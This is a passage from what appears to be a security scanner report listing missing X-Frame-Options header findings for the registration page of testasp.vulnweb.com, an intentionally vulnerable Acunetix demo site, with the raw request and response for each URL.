posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=27 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=28 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=29 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=3 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3550 |
Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=30 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=31 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=32 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=33 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure 